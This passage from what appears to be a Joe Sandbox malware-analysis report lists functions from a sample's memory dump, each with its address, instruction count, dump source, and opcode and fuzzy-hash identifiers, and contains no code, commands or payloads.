                                                                                                              Function 01BD69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 13aa93df3481132ef0500b91c00d348f9072c18ca79b0c30500028b95196cf43
                                                                                                              • Instruction ID: 1b8e4180a0c1d119e056e57da1638954151792a30903949396153fafc2fc7918
                                                                                                              • Opcode Fuzzy Hash: 13aa93df3481132ef0500b91c00d348f9072c18ca79b0c30500028b95196cf43
                                                                                                              • Instruction Fuzzy Hash: 0001DD322142169BC72CEF698444AA6BBA8EF58760F114269E95587190F730D905C7D1
                                                                                                              Function 01BCC460 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aca0f566dd2dfc8bf2892329f84e5505f1bd60cf05f28a7b98731da2e86081f0
                                                                                                              • Instruction ID: a4431eaa1cbfdc82c5b96ad3cd09e47a048c5a27c5acb8d0c4f365f4a52812a7
                                                                                                              • Opcode Fuzzy Hash: aca0f566dd2dfc8bf2892329f84e5505f1bd60cf05f28a7b98731da2e86081f0
                                                                                                              • Instruction Fuzzy Hash: FE115B75A00209EBDF19EFA8C850EAEBBB5EB58B40F008099FD0597390DB34E911CB90
                                                                                                              Function 01BCC97C Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb963bc34b539aa6935d2c8d7582d4bbd72aac4bc91de6818997350746cac9fe
                                                                                                              • Instruction ID: b8c5b98a38391660ce7678f467d66729bc42af717eff63e66bfbca7bf93efb34
                                                                                                              • Opcode Fuzzy Hash: fb963bc34b539aa6935d2c8d7582d4bbd72aac4bc91de6818997350746cac9fe
                                                                                                              • Instruction Fuzzy Hash: 9A113C716183059FC704DF69D441A9BBBE4EF98750F00455EB998D7391E770E901CB92
                                                                                                              Function 01C14A80 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                              • Instruction ID: 8b9f2b8f401a2f3cd9f4eb5c4d1277dd9e8e47fb2711f9b5dbc16693d8b5a2be
                                                                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                              • Instruction Fuzzy Hash: 3C012433240601DFDB298A6DC841F96BBEAFBC2300F054859E6428B658DBB0F841D7A0
                                                                                                              Function 01BCCA11 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80bc3815935339b137427eb141cb3a0d99bc43ce340614928b249fd9dc78865b
                                                                                                              • Instruction ID: 30b76aaea228201925219b0ea7fbf34842ddd1b370c9c5e07e8827055354d3c0
                                                                                                              • Opcode Fuzzy Hash: 80bc3815935339b137427eb141cb3a0d99bc43ce340614928b249fd9dc78865b
                                                                                                              • Instruction Fuzzy Hash: 2A1157B16083099FC704DF69C441A4ABBE8EF99B50F00855EB958D73A4E730E900CB92
                                                                                                              Function 01B5E016 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction ID: 850ebfc2af020b34ca8732684dfb5bed3a8e99450d6fc09407200c3aebc86a66
                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction Fuzzy Hash: C2017C32204580DFE76A9B1DC988F26BBE8EB48754F0D04E5F905CB6A1D728DD41C625
                                                                                                              Function 01B3826B Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee8d6e9bcfdd5ffe5cebebd1b2829a26c6b2a6dd50e2aff392940e7caffc791d
                                                                                                              • Instruction ID: 22720607a4664cec10a5cd025a5f8eca09d1172396b0880f3d47d186adc3f9c7
                                                                                                              • Opcode Fuzzy Hash: ee8d6e9bcfdd5ffe5cebebd1b2829a26c6b2a6dd50e2aff392940e7caffc791d
                                                                                                              • Instruction Fuzzy Hash: FF018432710505EBDB1CEB6ADC50AAA77A9EFD0A10B1541A9A901A7644DF20DD02C691
                                                                                                              Function 01BEEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 98748a051f7bd6f3a385a5ea902a4fdf96629728bdbd4a6db2f6a250ef42a8ec
                                                                                                              • Instruction ID: 50116d6fee5dc4a21f9ea04b9d21f351f0191d7fabda3a8ab1a361f533f4655b
                                                                                                              • Opcode Fuzzy Hash: 98748a051f7bd6f3a385a5ea902a4fdf96629728bdbd4a6db2f6a250ef42a8ec
                                                                                                              • Instruction Fuzzy Hash: C3018FB1240601AFDB3A5F29D941B16BAE8EF56B50F1144AAA706DB390D7B4D840CB54
                                                                                                              Function 01B42582 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3e7f9c515ee89ae358340f0f8bf9aef651e02233aafceacaeba550cca222010a
                                                                                                              • Instruction ID: 234f8d52d82ad1b243b7f84d8ef97ec8ad2ca8de06220e30377b006e64cb95f0
                                                                                                              • Opcode Fuzzy Hash: 3e7f9c515ee89ae358340f0f8bf9aef651e02233aafceacaeba550cca222010a
                                                                                                              • Instruction Fuzzy Hash: 4CF0F932641710B7CB399F569C40F17BEADEB84B90F0480A8BA0597610C730ED01EBE0
                                                                                                              Function 01B6C073 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction ID: fc8d3aa94299c3e9ec9de1bf78744bc8a00930d3a3eb8d293d3f7a1666e8e534
                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction Fuzzy Hash: 54F0C2B2600611ABD339CF4DDC40E67FBEEDBD5A80F048169A545C7220EB31ED05CB90
                                                                                                              Function 01B3C310 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction ID: 7bfcadeafc0a9e50c146b97dfe639070a9eee24fe941c409e312e2c0b6959d9a
                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction Fuzzy Hash: A9F0FC332446339BDB3A16D94880B2BBE95CFD5A64F1900B7E605BB204CF708D2256D1
                                                                                                              Function 01B7CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction ID: 4ef5696dfb6891c979dbbc737ec7a5517b0f4caa6f3356260a630bbca851e2b5
                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction Fuzzy Hash: B501D631200686AFD72AA71DC885BA9BFDCEF51750F0840E9FA148BAA1D7B8C800C250
                                                                                                              Function 01C161E5 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3ebb15d5dd15a9d68c4c2b09d48f6b420325f8c6d2edb77c335664bd09df9da
                                                                                                              • Instruction ID: bf50ae53beccc102dc9e7ee3b5a9f969fd9c3879163205e3777971340a653f4d
                                                                                                              • Opcode Fuzzy Hash: a3ebb15d5dd15a9d68c4c2b09d48f6b420325f8c6d2edb77c335664bd09df9da
                                                                                                              • Instruction Fuzzy Hash: EB017C71A00259EBCB04DFA9D441BEEBBF8AF58710F14405AE901A7290D774EA01CB94
                                                                                                              Function 01BC63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction ID: ae9a9c53827dec849ed925d95af89bc0b1fd2b6dae332b55441ea5384efd5bae
                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction Fuzzy Hash: 16F06D7220001DBFEF059F94DD80DAF7BBEEB587D8B104168FA00A2160D331DD21ABA0
                                                                                                              Function 01BCA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b6c3ea4d35d0e61b5e2666b2a5d287fa03f5884897cf6be6958dcc131fab393
                                                                                                              • Instruction ID: a7d730e92831573752ed3320bc19aa5e0f6cfaf1d37bb1c9b4c3f71cbeb40b84
                                                                                                              • Opcode Fuzzy Hash: 8b6c3ea4d35d0e61b5e2666b2a5d287fa03f5884897cf6be6958dcc131fab393
                                                                                                              • Instruction Fuzzy Hash: 1501853610020DABCF129E94D840EDA7F66FB5CB64F068245FE1966220C332D971EB81
                                                                                                              Function 01B3C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b9b66997be472e8c648fe2db44126e2cb2cd3278e76687abef97fecebd7f6f8d
                                                                                                              • Instruction ID: 0d303c6ba29fb4b958c830dcc8c02080fc70206956772984b6bdc3b1963cbb2c
                                                                                                              • Opcode Fuzzy Hash: b9b66997be472e8c648fe2db44126e2cb2cd3278e76687abef97fecebd7f6f8d
                                                                                                              • Instruction Fuzzy Hash: 97F024723046415BF71CA69A9C01B223B9AE7C0750FA680EBEB099B2C5EF70DC1193A4
                                                                                                              Function 01B7656A Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b5671b51e8a69e9c81a40ce06d25e39d59b2cde1b53bf0442e9178f71087c6f
                                                                                                              • Instruction ID: d7671eecdd0ec1d3a53ad3368a5c14a622ef17edb48f6fbfa4c50769c2dc4fe4
                                                                                                              • Opcode Fuzzy Hash: 8b5671b51e8a69e9c81a40ce06d25e39d59b2cde1b53bf0442e9178f71087c6f
                                                                                                              • Instruction Fuzzy Hash: C801A470601A86DFF72E972CCD88B7537E4FB50B40F4802E0BA12DBAE6D768D401D610
                                                                                                              Function 01BE437C Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction ID: 26060f4f47614582841a5b7e17cd46aa29c32ae351e6cbe7e40193d3f9cb637e
                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction Fuzzy Hash: 5EF0E93534191347EB7EAA2D8454B2FA6D5DF90940B1506BC9651CB640DF64D80087A0
                                                                                                              Function 01BCC89D Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0dc2cb328cd37057d70518108a279a66aed84586c1952b8c2977496399820195
                                                                                                              • Instruction ID: f8ba6ea3e8a86fb94dc724acc17fe7d4e78558bf3ac021770dc835db9e749b9d
                                                                                                              • Opcode Fuzzy Hash: 0dc2cb328cd37057d70518108a279a66aed84586c1952b8c2977496399820195
                                                                                                              • Instruction Fuzzy Hash: 5CF081706053049FC714EF68C441B1BBBE4EF58B10F40469EB898DB390E734E901C756
                                                                                                              Function 01BCE872 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction ID: 9ce2fdb70ed7305364f887d6d646b631a9c96b40fd5544ef4ccbde53fac82814
                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction Fuzzy Hash: A4F05E32711612DBE7399A4ECC80F17BBA8EFD5E60F5901A9AA049B260C760EC01C7E0
                                                                                                              Function 01B70854 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction ID: 3befaf96cb7f6f45641edd8e74b513d3f5d0247676ab71588784cf9b92f3e2e2
                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction Fuzzy Hash: 3DF0E9B2614204AFE728EF25CC01F56B7EDEF99340F1480B9A945D7260FBB0ED11D654
                                                                                                              Function 01BCC912 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e54fcfaa34f5fce7f76acc9463e9e40830a275c0dc658a119de1d118c8f74aa3
                                                                                                              • Instruction ID: 115385e495cbc9ca0aff293263dbeeff67e1915bd3c03ca86aa86741a9059c5d
                                                                                                              • Opcode Fuzzy Hash: e54fcfaa34f5fce7f76acc9463e9e40830a275c0dc658a119de1d118c8f74aa3
                                                                                                              • Instruction Fuzzy Hash: 33F03170A012499BCB08EFA9C555B9EB7B4EF18700F104199A955EB395DA74DA01CB50
                                                                                                              Function 01B447FB Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: faee54d599c56706886eb3c43ae330fab4d84b37ff2705cd37aaa8e1b0d0b5d3
                                                                                                              • Instruction ID: 04a8109c3f1fe27fb6be058db3a5b2bae91d2df422973e6b38fa311fe499c43c
                                                                                                              • Opcode Fuzzy Hash: faee54d599c56706886eb3c43ae330fab4d84b37ff2705cd37aaa8e1b0d0b5d3
                                                                                                              • Instruction Fuzzy Hash: 4AF0BE319166E19FF73ACB6CC044B21BBD4DB01620F09C9EAD98987902C735D8A0E650
                                                                                                              Function 01C00115 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d19847a54ef7579e57cf818e52d1363e803e676cf54d77d021d9cc3abd3aa285
                                                                                                              • Instruction ID: dd5fc1992178e0595fe6b2f4dd3ea45e414c45b54d0b107fb0b0daece3c6002b
                                                                                                              • Opcode Fuzzy Hash: d19847a54ef7579e57cf818e52d1363e803e676cf54d77d021d9cc3abd3aa285
                                                                                                              • Instruction Fuzzy Hash: BAF0277A419BD096CF336B6C64503D16B65A761160F0B10C9D9A657245C674C793C320
                                                                                                              Function 01B7C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 818a46b14e066a27e0de681145778feac04d1d3625770e65282ae4e2740bd740
                                                                                                              • Instruction ID: 937dbd865a4a9d351cd7080baf2c1e6fc3902b0189bf41bb15c2e844120e4b72
                                                                                                              • Opcode Fuzzy Hash: 818a46b14e066a27e0de681145778feac04d1d3625770e65282ae4e2740bd740
                                                                                                              • Instruction Fuzzy Hash: B4F0E2715116539FE72A9B1CC1C8B11BFD4DB017A0F09A5EDF92687512C360E880CA50
                                                                                                              Function 01B82619 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: 03db498e1e279310374e041e59bfb46b09245f39d6e58d053939ecabbc1724ed
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: A4E092723006412BEB26AE598D80F57776EDFD6B14F0400B9B9045E251CBE2DC09C2A4
                                                                                                              Function 01BD6030 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction ID: 50e92958eb81ce2d8920b0836481bae443b4f7307008130779e9bfaec661ecf6
                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction Fuzzy Hash: 81F06572154204DFE32D8F49D984F52B7F8EB19364F45C0A5E6099B561E379EC40CBA4
                                                                                                              Function 01B40710 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: 1cb59b3d6f1db7893efd439e078f1808cf3865b091566280fc54d0bb6ae3dbb9
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: 5EF0A0393043469BDF1EEF19D040AD57BE4EB41350B0040D4F9428B351D731E982CB51
                                                                                                              Function 01B749D0 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: e34f51e634b5955cdb752100fac92607b8a900f070b0434181a51c3a5baa1e4b
